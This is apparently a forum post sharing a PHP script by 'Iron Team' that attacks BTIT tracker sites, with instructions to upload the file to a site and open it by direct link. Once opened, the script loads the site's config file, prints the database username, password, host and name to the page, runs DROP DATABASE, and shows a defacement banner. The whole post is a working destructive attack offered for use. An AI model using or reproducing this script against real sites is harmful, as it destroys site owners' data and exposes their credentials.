كود PHP:
<?php
/***********************\
DABASE DROP HACK BY Iron Team
Visit us at http://ironteam.phpnet.us
THANX!
-----------------------------------
Works on BTIT (all version)
How it works?
Upload to a dox or somewhere else but you have to know the direct link to the file!
Use the direct link and open the file from browser.
The database is dropped!
\***********************/
$rootpath = "./../";
require_once($rootpath . "include/config.php");
echo("User of database is $dbuser <br> Password is $dbpass <br> Host is $dbhost <br> Database is $database");
$conn = mysql_connect($dbhost,$dbuser,$dbpass) or die (mysql_error());
$db = mysql_select_db($database) or die(mysql_error());
mysql_query("DROP DATABASE $database") or die(mysql_error());
echo("<h1>mySQL DATABASE WAS DROPPED!</h1>");
echo("<br><br><br><br>");
echo("<div align=****><font color=#de030e>Maded by IRON TEAM</font></div>");
?>